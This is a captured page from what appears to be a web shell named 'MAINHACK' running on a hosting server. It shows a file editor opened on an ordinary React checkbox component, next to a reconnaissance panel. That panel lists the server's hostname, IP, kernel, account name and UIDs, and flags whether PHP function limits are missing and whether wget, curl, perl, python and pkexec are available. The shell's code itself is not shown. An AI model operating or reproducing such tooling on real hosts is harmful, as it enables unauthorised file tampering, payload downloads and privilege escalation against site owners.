[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: CheckboxInput.jsx
import classNames from 'classnames'; export const CheckboxInput = ({ label, slug, description, checked, onChange, locked = false, }) => { return ( <label className={classNames('flex items-center px-4 py-3.5', { 'cursor-not-allowed': locked, 'focus-within:text-design-mains hover:text-design-main': !locked, })} htmlFor={slug}> <span className="relative mr-3 inline-block h-5 w-5 align-middle"> <input id={slug} className="m-0 h-5 w-5 rounded-sm" style={{ '--ext-design-main': locked ? '#BBBBBB' : undefined, }} disabled={locked} type="checkbox" onChange={locked ? undefined : onChange} checked={locked ? true : checked} /> <svg className={classNames('absolute inset-0 block h-5 w-5', { 'text-white': checked, 'text-transparent': !checked, })} viewBox="1 0 20 20" fill="none" xmlns="http://www.w3.org/2000/svg" role="presentation"> <path d="M8.72912 13.7449L5.77536 10.7911L4.76953 11.7899L8.72912 15.7495L17.2291 7.24948L16.2304 6.25073L8.72912 13.7449Z" fill="currentColor" /> </svg> </span> <span className="flex grow flex-col overflow-hidden"> <span className="truncate text-base font-medium leading-tight"> {label} </span> {description ? ( <span className="block pt-1">{description}</span> ) : ( <span /> )} </span> </label> ); };
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium166.web-hosting.com
Server IP: 162.0.209.40
PHP Version: 8.1.34
Server Software: LiteSpeed
System: Linux premium166.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 75.3 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
No
pkexec:
No
git:
Yes
User Info
Username: kataubyb
User ID (UID): 624
Group ID (GID): 625
Script Owner UID: 624
Current Dir Owner: 624